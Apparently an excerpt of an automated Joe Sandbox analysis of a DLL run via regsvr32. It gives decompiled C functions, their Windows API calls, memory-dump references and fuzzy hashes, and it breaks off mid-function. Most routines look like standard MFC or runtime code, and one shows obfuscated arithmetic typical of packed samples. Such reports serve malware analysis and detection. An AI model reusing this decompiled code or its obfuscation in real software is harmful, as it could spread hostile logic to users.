                                                                                                            								_t87 = _a12;
                                                                                                            								if(_t87 != 0) {
                                                                                                            									 *((intOrPtr*)(_t87 + 0xc)) = GetLastError();
                                                                                                            									 *((intOrPtr*)(_t87 + 8)) = E10026E5B(_t61);
                                                                                                            									E10006AEC(_t87 + 0x10, _a4);
                                                                                                            								}
                                                                                                            								goto L30;
                                                                                                            							}
                                                                                                            						}
                                                                                                            						if(_t53 == 0x30) {
                                                                                                            							_t81 = 2;
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						if(_t53 == 0x40) {
                                                                                                            							goto L14;
                                                                                                            						}
                                                                                                            						goto L13;
                                                                                                            					}
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • lstrlenA.KERNEL32(00000000), ref: 10025AA1
                                                                                                              • Part of subcall function 1002592C: __EH_prolog.LIBCMT ref: 10025931
                                                                                                              • Part of subcall function 1002592C: GetFullPathNameA.KERNEL32(?,00000104,?,?), ref: 1002595B
                                                                                                              • Part of subcall function 1002592C: lstrcpynA.KERNEL32(?,?,00000104), ref: 1002596C
                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000000,0000000C,00000003,00000080,00000000,?,?,00000000), ref: 10025BB6
                                                                                                            • GetLastError.KERNEL32 ref: 10025BC8
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CreateErrorFileFullH_prologLastNamePathlstrcpynlstrlen
                                                                                                            • String ID: @Mv@hvpYv
                                                                                                            • API String ID: 4207171074-4125583295
                                                                                                            • Opcode ID: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction ID: b9e8efc14b2e37d74310b66cc6c275d2155126b32d67271340f07ea8c5c0b371
                                                                                                            • Opcode Fuzzy Hash: 8c59be7035e985f6fea5b2ca5dcb1a7e57374fcad9b326a003094a27d539e147
                                                                                                            • Instruction Fuzzy Hash: 2141E771A00615ABEB12CF25EC82BDE77E4EB04391F90C529E917CB1D0DB7AD981CB54
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 95%
                                                                                                            			E10033B73(intOrPtr __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, signed char _a17) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				void* __ebp;
                                                                                                            				int _t42;
                                                                                                            				void* _t69;
                                                                                                            				intOrPtr _t71;
                                                                                                            				intOrPtr* _t74;
                                                                                                            				intOrPtr _t76;
                                                                                                            				void* _t77;
                                                                                                            
                                                                                                            				_t69 = __edx;
                                                                                                            				_push(__ecx);
                                                                                                            				_t71 = _a4;
                                                                                                            				_v8 = __ecx;
                                                                                                            				if( *((intOrPtr*)(_t71 + 0x84)) == 0) {
                                                                                                            					L6:
                                                                                                            					if(( *(_t71 + 0x7c) & 0x00000004) != 0) {
                                                                                                            						_a16 = _a16 | 0x00000004;
                                                                                                            						if((_a17 & 0x00000050) != 0) {
                                                                                                            							_a16 = _a16 & 0xffff2fff | 0x00002000;
                                                                                                            						}
                                                                                                            					}
                                                                                                            					_t74 = E100339A3(_v8, _a16);
                                                                                                            					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                                                            					if( *(_t74 + 0x34) == 0) {
                                                                                                            						 *(_t74 + 0x34) =  *(_t71 + 0x1c);
                                                                                                            					}
                                                                                                            					E1002D821(E10020230(_t74, 0xe81f), _t69, _t71, 0);
                                                                                                            					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                                                            					_t42 = GetWindowLongA( *(_t71 + 0x1c), 0xfffffff0);
                                                                                                            					if((_t42 & 0x10000000) == 0) {
                                                                                                            						L14:
                                                                                                            						return _t42;
                                                                                                            					} else {
                                                                                                            						E100203AD(_t74, 8);
                                                                                                            						L13:
                                                                                                            						_t42 = UpdateWindow( *(_t74 + 0x1c));
                                                                                                            						goto L14;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				_t76 =  *((intOrPtr*)(_t71 + 0x88));
                                                                                                            				if(_t76 == 0 ||  *((intOrPtr*)(_t76 + 0x90)) == 0 || E1002D0E3(_t76) != 1 || ( *(_t76 + 0x7c) & _a16 & 0x000000f0) == 0) {
                                                                                                            					goto L6;
                                                                                                            				} else {
                                                                                                            					_t74 = E100220EE(_t77, GetParent( *(_t76 + 0x1c)));
                                                                                                            					E100204FE(_t74, 0, _a8, _a12, 0, 0, 0x15);
                                                                                                            					 *((intOrPtr*)( *_t74 + 0x144))(1);
                                                                                                            					goto L13;
                                                                                                            				}
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetParent.USER32(?), ref: 10033BB6
                                                                                                              • Part of subcall function 100204FE: SetWindowPos.USER32(?,000000FF,000000FF,?,?,00000000,10021B8B,?,10021B8B,00000000,?,?,000000FF,000000FF,00000015), ref: 10020524
                                                                                                            • GetWindowLongA.USER32 ref: 10033C57
                                                                                                            • UpdateWindow.USER32(?), ref: 10033C70
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Window$LongParentUpdate
                                                                                                            • String ID: P
                                                                                                            • API String ID: 1906497633-3110715001
                                                                                                            • Opcode ID: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction ID: 435d97fdf23aa9ac89b11464d0137bb6244da47e738824af3fb8fae0d11c22b6
                                                                                                            • Opcode Fuzzy Hash: 1aa47bf77bde570b2f872847916c02f4d304f75a391983709c29405f80532f22
                                                                                                            • Instruction Fuzzy Hash: 1D31BE74600749AFDB12DF24DC89FAEBBE9EF00355F008519F952AA6A2CB71AC50CB50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 53%
                                                                                                            			E10034C5F(void* __ebx, void* __ecx, void* __edi, void* __esi) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v16;
                                                                                                            				char _v276;
                                                                                                            				intOrPtr _t10;
                                                                                                            				long _t12;
                                                                                                            				void* _t13;
                                                                                                            				CHAR* _t16;
                                                                                                            				void* _t30;
                                                                                                            				void* _t33;
                                                                                                            
                                                                                                            				_t10 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t10;
                                                                                                            				_t12 = GetModuleFileNameA( *(__ecx + 0x40),  &_v276, 0x104);
                                                                                                            				if(_t12 == 0 || _t12 == 0x104) {
                                                                                                            					L4:
                                                                                                            					_t13 = 0;
                                                                                                            				} else {
                                                                                                            					_push(__esi);
                                                                                                            					_push(__edi);
                                                                                                            					_t16 = PathFindExtensionA( &_v276);
                                                                                                            					asm("movsd");
                                                                                                            					asm("movsw");
                                                                                                            					asm("movsb");
                                                                                                            					_pop(_t30);
                                                                                                            					_pop(_t33);
                                                                                                            					if(_t16 -  &_v276 + 7 > 0x104) {
                                                                                                            						goto L4;
                                                                                                            					} else {
                                                                                                            						lstrcpyA(_t16,  &_v16);
                                                                                                            						_t13 = E10034959(0x104, _t30, _t33,  &_v276);
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return E100117AE(_t13, _v8);
                                                                                                            			}

                                                                                                            APIs
                                                                                                            • GetModuleFileNameA.KERNEL32(?,?,00000104), ref: 10034C81
                                                                                                            • PathFindExtensionA.SHLWAPI(?), ref: 10034C98
                                                                                                            • lstrcpyA.KERNEL32(00000000,?), ref: 10034CC2
                                                                                                              • Part of subcall function 10034959: GetModuleHandleA.KERNEL32(kernel32.dll), ref: 1003497C
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10034987
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349B8
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349C0
                                                                                                              • Part of subcall function 10034959: GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 100349CD
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(?), ref: 100349E7
                                                                                                              • Part of subcall function 10034959: ConvertDefaultLocale.KERNEL32(000003FF), ref: 100349ED
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ConvertDefaultLocale$AddressModuleProc$ExtensionFileFindHandleNamePathlstrcpy
                                                                                                            • String ID: %s.dll
                                                                                                            • API String ID: 4178508759-3668843792
                                                                                                            • Opcode ID: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction ID: 2fc2d964ca32bfe118a4256934f177e00eb1d7d938e4b77c6fceda29c47fe86b
                                                                                                            • Opcode Fuzzy Hash: b239b4a749a3f1fe9012e83a6400b740ecd91a9485a51850a2c9564d23267978
                                                                                                            • Instruction Fuzzy Hash: 4601A7B6E0111CAFDF56EBA4CC85DEE77BCFB49341F0105BAE615DB110EAB0AA448B50
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 59%
                                                                                                            			E100364C3() {
                                                                                                            				signed short _v16;
                                                                                                            				signed short _v20;
                                                                                                            				char _v24;
                                                                                                            				signed int _t6;
                                                                                                            				intOrPtr* _t16;
                                                                                                            				signed int _t19;
                                                                                                            
                                                                                                            				_t6 =  *0x1004b8c8; // 0xffffffff
                                                                                                            				if(_t6 != 0xffffffff) {
                                                                                                            					return _t6;
                                                                                                            				}
                                                                                                            				_t16 = GetProcAddress(GetModuleHandleA("COMCTL32.DLL"), "DllGetVersion");
                                                                                                            				_t19 = 0x40000;
                                                                                                            				if(_t16 != 0) {
                                                                                                            					E10011C50( &_v24, 0, 0x14);
                                                                                                            					_push( &_v24);
                                                                                                            					_v24 = 0x14;
                                                                                                            					if( *_t16() >= 0) {
                                                                                                            						_t19 = (_v20 & 0x0000ffff) << 0x00000010 | _v16 & 0x0000ffff;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *0x1004b8c8 = _t19;
                                                                                                            				return _t19;
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(COMCTL32.DLL), ref: 100364DA
                                                                                                            • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 100364E6
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: COMCTL32.DLL$DllGetVersion
                                                                                                            • API String ID: 1646373207-1518460440
                                                                                                            • Opcode ID: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction ID: 84e3accee20d911db9e507edd914a9ca92682ab11397d206feed8d4dda6cc4c4
                                                                                                            • Opcode Fuzzy Hash: 86f100722229a12ed79f51ec8640560dc67c7ca5587518f6e929f072c7dba21f
                                                                                                            • Instruction Fuzzy Hash: 3BF04FB1E006296AE702DBED9C84BAA7BACEB08751F510535FA10EB191E670DD0487B5
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 86%
                                                                                                            			E10029A8E(struct HWND__* _a4, intOrPtr _a8) {
                                                                                                            				intOrPtr _v8;
                                                                                                            				char _v20;
                                                                                                            				intOrPtr _t9;
                                                                                                            				signed int _t17;
                                                                                                            
                                                                                                            				_t9 =  *0x1004c470; // 0xf3933a06
                                                                                                            				_v8 = _t9;
                                                                                                            				if(_a4 == 0 || (GetWindowLongA(_a4, 0xfffffff0) & 0x0000000f) != _a8) {
                                                                                                            					_t10 = 0;
                                                                                                            				} else {
                                                                                                            					GetClassNameA(_a4,  &_v20, 0xa);
                                                                                                            					_t17 = lstrcmpiA( &_v20, "combobox");
                                                                                                            					asm("sbb eax, eax");
                                                                                                            					_t10 =  ~_t17 + 1;
                                                                                                            				}
                                                                                                            				return E100117AE(_t10, _v8);
                                                                                                            			}








                                                                                                            APIs
                                                                                                            • GetWindowLongA.USER32 ref: 10029AA7
                                                                                                            • GetClassNameA.USER32(00000000,?,0000000A), ref: 10029AC2
                                                                                                            • lstrcmpiA.KERNEL32(?,combobox), ref: 10029AD1
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ClassLongNameWindowlstrcmpi
                                                                                                            • String ID: combobox
                                                                                                            • API String ID: 2054663530-2240613097
                                                                                                            • Opcode ID: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction ID: 60cbb10a2f119aa8ec71494133184de8fc03b2720933236f2cbab57e6d3057ab
                                                                                                            • Opcode Fuzzy Hash: b565fbde65d357027d71975a0393c0b3c5905c388aa4c7cc1e9ad52267c02c24
                                                                                                            • Instruction Fuzzy Hash: 32F03A3151421CAFDB01EFA5CC95EAE3BB4FB05385F508524F821DA1A1DB30AA448B91
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 62%
                                                                                                            			E10019599(void* __eflags) {
                                                                                                            				_Unknown_base(*)()* _t9;
                                                                                                            				struct HINSTANCE__* _t12;
                                                                                                            				void* _t13;
                                                                                                            				void* _t14;
                                                                                                            				void* _t15;
                                                                                                            				void* _t16;
                                                                                                            
                                                                                                            				_push(0x10);
                                                                                                            				_push(0x10042d28);
                                                                                                            				E10012514(_t13, _t14, _t15);
                                                                                                            				_t9 =  *0x1004f820;
                                                                                                            				if(_t9 == 0) {
                                                                                                            					if( *0x1004f3e0 == 1) {
                                                                                                            						L4:
                                                                                                            						_t9 = 0x10019589;
                                                                                                            						 *0x1004f820 = 0x10019589;
                                                                                                            					} else {
                                                                                                            						_t12 = GetModuleHandleA("kernel32.dll");
                                                                                                            						if(_t12 == 0) {
                                                                                                            							goto L4;
                                                                                                            						} else {
                                                                                                            							_t9 = GetProcAddress(_t12, "InitializeCriticalSectionAndSpinCount");
                                                                                                            							 *0x1004f820 = _t9;
                                                                                                            							if(_t9 == 0) {
                                                                                                            								goto L4;
                                                                                                            							}
                                                                                                            						}
                                                                                                            					}
                                                                                                            				}
                                                                                                            				 *(_t16 - 4) =  *(_t16 - 4) & 0x00000000;
                                                                                                            				 *((intOrPtr*)(_t16 - 0x20)) =  *_t9( *((intOrPtr*)(_t16 + 8)),  *((intOrPtr*)(_t16 + 0xc)));
                                                                                                            				 *(_t16 - 4) =  *(_t16 - 4) | 0xffffffff;
                                                                                                            				return E1001254F(_t10);
                                                                                                            			}










                                                                                                            APIs
                                                                                                            • GetModuleHandleA.KERNEL32(kernel32.dll,10042D28,00000010,100139E9,00000000,00000FA0,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010), ref: 100195BC
                                                                                                            • GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionAndSpinCount), ref: 100195CC
                                                                                                            Strings
                                                                                                            • kernel32.dll, xrefs: 100195B7
                                                                                                            • InitializeCriticalSectionAndSpinCount, xrefs: 100195C6
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProc
                                                                                                            • String ID: InitializeCriticalSectionAndSpinCount$kernel32.dll
                                                                                                            • API String ID: 1646373207-3733552308
                                                                                                            • Opcode ID: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction ID: 1db327cb421c3a6b8c58775e1e461de9fba8f787e71f0b035f5b3f69bb676500
                                                                                                            • Opcode Fuzzy Hash: de7d8ff9db104f549b98b02cbf17b951478f015e0dd05221f36ae1f15d058f40
                                                                                                            • Instruction Fuzzy Hash: 05F05E70600656EFEB02EFA58D98B9D3AF2FB45345B114169F410EE160EB35D6809B28
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 64%
                                                                                                            			E10004DD0() {
                                                                                                            				void* _t51;
                                                                                                            				signed int _t53;
                                                                                                            				signed int _t59;
                                                                                                            				signed int _t61;
                                                                                                            				intOrPtr _t82;
                                                                                                            				signed int _t96;
                                                                                                            				signed int _t103;
                                                                                                            				signed int _t111;
                                                                                                            				signed int _t112;
                                                                                                            				signed int _t120;
                                                                                                            				signed int _t121;
                                                                                                            				signed int _t125;
                                                                                                            				signed int _t132;
                                                                                                            				signed int _t139;
                                                                                                            				signed int _t142;
                                                                                                            				signed int _t151;
                                                                                                            				intOrPtr _t157;
                                                                                                            				signed int _t159;
                                                                                                            				signed int _t162;
                                                                                                            				signed int _t163;
                                                                                                            				void* _t164;
                                                                                                            				signed int _t166;
                                                                                                            				signed int _t173;
                                                                                                            				signed int _t177;
                                                                                                            				signed int _t189;
                                                                                                            				void* _t195;
                                                                                                            				void* _t196;
                                                                                                            
                                                                                                            				_t164 =  *(_t195 + 0xc);
                                                                                                            				if(_t164 != 0) {
                                                                                                            					if( *((intOrPtr*)(_t164 + 0x10)) != 0) {
                                                                                                            						_t132 =  *0x1004b0e0; // 0x0
                                                                                                            						_t103 =  *0x1004b0dc; // 0x0
                                                                                                            						_t151 =  *0x1004b0e8; // 0x0
                                                                                                            						_t162 =  *0x1004b0e4; // 0x0
                                                                                                            						_t82 =  *((intOrPtr*)(_t164 + 4));
                                                                                                            						_t163 =  *0x1004b0ec; // 0x0
                                                                                                            						 *((intOrPtr*)( *((intOrPtr*)( *_t164 + 0x28)) + ((_t103 * _t132 * _t151 + _t162 * 2) * _t151 + _t132 * _t132 - _t162 - _t163) * 4 + _t82))(_t82, 0, 0);
                                                                                                            					}
                                                                                                            					_t111 =  *0x1004b0dc; // 0x0
                                                                                                            					_t53 =  *0x1004b0e8; // 0x0
                                                                                                            					_t166 =  *0x1004b0ec; // 0x0
                                                                                                            					_t10 = _t111 + 1; // 0x1
                                                                                                            					_t112 =  *0x1004b0e0; // 0x0
                                                                                                            					 *0x1004d3e0(((_t112 - _t166 << 1) - _t10 * _t111 -  *0x1004b0e4 + _t53 *  *0x1004b0d8 << 5) +  *((intOrPtr*)(_t164 + 0x30)));
                                                                                                            					_t196 = _t195 + 4;
                                                                                                            					if( *((intOrPtr*)(_t164 + 8)) == 0) {
                                                                                                            						L9:
                                                                                                            						_t157 =  *((intOrPtr*)(_t164 + 4));
                                                                                                            						if(_t157 != 0) {
                                                                                                            							_t59 =  *0x1004b0dc; // 0x0
                                                                                                            							_t120 =  *0x1004b0ec; // 0x0
                                                                                                            							_t139 =  *0x1004b0e8; // 0x0
                                                                                                            							_t121 =  *0x1004b0e0; // 0x0
                                                                                                            							 *((intOrPtr*)(_t164 + 0x20))(_t157, 0, (_t59 * _t120 + 1 + _t139 *  *0x1004b0d8 * 0x3fffffff) * _t120 + (_t139 + 1 + _t121 * 0x3fffffff) *  *0x1004b0e4 + 0x2000 + _t121 * 2 - _t59 << 2,  *((intOrPtr*)(_t164 + 0x34)));
                                                                                                            						}
                                                                                                            						return HeapFree(GetProcessHeap(), 0, _t164);
                                                                                                            					} else {
                                                                                                            						_t125 =  *0x1004b0e0; // 0x0
                                                                                                            						_t159 =  *0x1004b0ec; // 0x0
                                                                                                            						_t173 =  *0x1004b0dc; // 0x0
                                                                                                            						_t142 =  *0x1004b0d8; // 0x0
                                                                                                            						_t61 =  *0x1004b0e4; // 0x0
                                                                                                            						_t12 = _t125 + 1; // 0x1
                                                                                                            						 *(_t196 + 0x18) = 0;
                                                                                                            						if( *((intOrPtr*)(_t164 + 0xc)) - (_t173 * _t142 + _t12 * _t159 + _t61 << 1) <= 0) {
                                                                                                            							L8:
                                                                                                            							 *0x1004d3e0((_t61 << 4) - ((_t142 * _t142 << 4) + 0x10) * _t159 +  *((intOrPtr*)(_t164 + 8)));
                                                                                                            							_t196 = _t196 + 4;
                                                                                                            							goto L9;
                                                                                                            						} else {
                                                                                                            							goto L5;
                                                                                                            						}
                                                                                                            						do {
                                                                                                            							L5:
                                                                                                            							_t96 =  *0x1004b0dc; // 0x0
                                                                                                            							_t177 =  *0x1004b0e8; // 0x0
                                                                                                            							 *((intOrPtr*)(_t196 + 0x10)) =  *((intOrPtr*)(_t164 + 8));
                                                                                                            							if( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x10)) + ( *(_t196 + 0x18) + ((_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 2 + (_t159 - _t96 - 1) * _t125 + _t177 * _t142) * 4)) != 0) {
                                                                                                            								_t189 =  *0x1004b0e4; // 0x0
                                                                                                            								_t25 = _t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 - 2; // -268742890
                                                                                                            								 *((intOrPtr*)(_t164 + 0x2c))( *((intOrPtr*)( *((intOrPtr*)(_t196 + 0x14)) + ((_t125 - (_t142 * _t142 << 1) + _t125 + 2) *  *0x1004b0e4 +  *((intOrPtr*)(_t196 + 0x1c)) + (_t159 - (_t96 *  *0x1004b0e8 + _t189) * _t125 -  *0x1004b0e8 + _t142 + _t25) * _t96 + (_t159 + 1) * _t125 * 2) * 4)),  *((intOrPtr*)(_t164 + 0x34)));
                                                                                                            								_t142 =  *0x1004b0d8; // 0x0
                                                                                                            								_t159 =  *0x1004b0ec; // 0x0
                                                                                                            								_t125 =  *0x1004b0e0; // 0x0
                                                                                                            								_t96 =  *0x1004b0dc; // 0x0
                                                                                                            								_t196 = _t196 + 8;
                                                                                                            							}
                                                                                                            							_t61 =  *0x1004b0e4; // 0x0
                                                                                                            							 *(_t196 + 0x18) =  *(_t196 + 0x18) + 1;
                                                                                                            							_t37 = _t125 + 1; // 0x1
                                                                                                            						} while ( *(_t196 + 0x18) <  *((intOrPtr*)(_t164 + 0xc)) - (_t96 * _t142 + _t37 * _t159 + _t61 << 1));
                                                                                                            						goto L8;
                                                                                                            					}
                                                                                                            				}
                                                                                                            				return _t51;
                                                                                                            			}































                                                                                                            APIs
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004E6C
                                                                                                            • ??3@YAXPAX@Z.MSVCRT ref: 10004FB4
                                                                                                            • GetProcessHeap.KERNEL32(00000000,?,00000000), ref: 10005028
                                                                                                            • HeapFree.KERNEL32(00000000), ref: 1000502F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000002.00000002.387975983.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                            • Associated: 00000002.00000002.387971059.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388093865.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388107986.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388186096.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            • Associated: 00000002.00000002.388493564.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ??3@Heap$FreeProcess
                                                                                                            • String ID:
                                                                                                            • API String ID: 834397476-0
                                                                                                            • Opcode ID: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction ID: 9f87828e50faab3a5d058e3d57900a61c1aef8edd5c1bc6d424dad7412e7468d
                                                                                                            • Opcode Fuzzy Hash: 391aa570712f7e89dbfeb0fca8f603a18ca8548013477e7103293fc6906814a1
                                                                                                            • Instruction Fuzzy Hash: 94719631200B158FE318DF6CCEC5A57B7A9FB89341B05C52ED926CB7A5E670E905CB48
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            C-Code - Quality: 69%
                                                                                                            			E1000E9AF(intOrPtr __ecx, intOrPtr* __edi) {
                                                                                                            				void* __ebx;
                                                                                                            				void* __esi;
                                                                                                            				intOrPtr* _t87;
                                                                                                            				intOrPtr* _t88;
                                                                                                            				intOrPtr _t89;
                                                                                                            				intOrPtr* _t90;
                                                                                                            				void* _t91;
                                                                                                            				intOrPtr _t104;
                                                                                                            				intOrPtr* _t121;
                                                                                                            				intOrPtr* _t122;
                                                                                                            				intOrPtr* _t124;
                                                                                                            				intOrPtr* _t126;
                                                                                                            				intOrPtr* _t128;
                                                                                                            				intOrPtr* _t130;
                                                                                                            				intOrPtr* _t148;
                                                                                                            				intOrPtr* _t161;
                                                                                                            				intOrPtr _t162;
                                                                                                            				intOrPtr _t163;
                                                                                                            				void* _t165;
                                                                                                            				intOrPtr _t167;
                                                                                                            				intOrPtr* _t168;
                                                                                                            				void* _t170;
                                                                                                            				intOrPtr _t183;
                                                                                                            
                                                                                                            				_t161 = __edi;
                                                                                                            				E10011BF0(0x1003af91, _t170);
                                                                                                            				_t167 = __ecx;
                                                                                                            				 *((intOrPtr*)(_t170 - 0x1c)) = __ecx;
                                                                                                            				 *((intOrPtr*)(__ecx)) = 0x1004060c;
                                                                                                            				 *(_t170 - 4) = 0;
                                                                                                            				if( *((intOrPtr*)(__ecx + 0x58)) != 0) {
